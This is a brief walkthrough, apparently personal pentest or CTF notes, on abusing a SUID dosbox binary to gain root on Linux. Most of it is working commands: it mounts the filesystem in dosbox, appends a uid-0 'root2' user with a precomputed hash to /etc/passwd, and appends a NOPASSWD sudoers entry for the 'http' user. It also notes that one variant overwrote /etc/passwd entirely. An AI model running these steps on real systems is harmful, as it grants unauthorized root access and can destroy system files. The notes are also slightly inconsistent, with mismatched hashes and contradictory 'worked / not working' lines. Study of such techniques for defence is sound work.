dosbox

We cannot directly get privilege escalation from this but we can write to a file and get privilege of root user.

Possible files include passwd, sudoers, and SSH if the port is open.

Targeting passwd

I will be writing to /etc/passwd file.

Make a password that has an encrypted root value.

openssl passwd root

Value for adding new user to passwd file.

echo "root2:4us36OQWR7F/Y:0:0:root:/root:/bin/bash"

Now I will abuse dosbox suid to write to /etc/passwd file.

LFILE='/etc/passwd'
DATA="root2:4tG5TRjVMiM.k:0:0:root:/root:/bin/bash"

/usr/bin/dosbox -c 'mount c /' -c "echo $DATA >c:$LFILE" -c exit

This overwrite the file completely.

I will try another way that is I will append my value. First, I will reset the machine and start again.

/usr/bin/dosbox -c 'mount c /' -c "echo $DATA >>c:$LFILE" -c exit

This worked and our new user is added successfully.

Not working in this case.

I will change the sudoers file and give sudo access to the current user. I know that current user is http.

DATA="http ALL=(ALL) NOPASSWD: ALL"

LFILE='/etc/sudoers'

/usr/bin/dosbox -c 'mount c /' -c "echo $DATA >>c:$LFILE" -c exit

Now start the new shell and switch to the root user. [Don't forget to stabilize it]

sudo su

Last updated 11 months ago